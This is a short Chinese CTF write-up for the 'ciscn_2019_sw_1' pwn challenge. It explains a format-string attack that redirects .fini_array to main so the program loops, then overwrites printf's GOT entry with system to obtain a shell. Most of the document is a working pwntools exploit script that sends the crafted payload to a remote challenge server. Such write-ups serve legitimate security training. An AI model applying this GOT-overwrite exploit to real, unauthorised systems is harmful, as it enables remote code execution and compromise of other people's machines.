思路
通過格式化字符串是程序無限循環(__do_global_dtors_aux_fini_array_entry內存的地址寫成main函數地址)
我們是通過libc_start_main調用main函數不管是在man函數調用前後都會調用fini函數的指針所以只要將其寫壞即可然後將print_got表寫成system即可拿到shell
exp:
from pwn import *
#p=process('./ciscn_2019_sw_1')
p=remote('node3.buuoj.cn',25777)
elf=ELF('./ciscn_2019_sw_1')
main=0x08048534
fini=0x0804979C
printf=elf.got['printf']
system=0x80483D0
system_low=system&0xffff
system_height=system>>16
offset=4
#payload=fmtstr_payload(offset,{fini:main},write_size='short')
payload=p32(fini)+p32(printf)+p32(printf+2)+p32(fini+2)
payload+='%'+str(main&0xffff-0x10)+'d%4$hn'+'%'+str(system_low+0x7ad0-4)+'d'+'%5$hn'+'%'+str(0x8434)+'d%6$hn'
p.sendline(payload)
log.success('payload_length: '+str(len(payload)))
p.interactive()
print len(payload)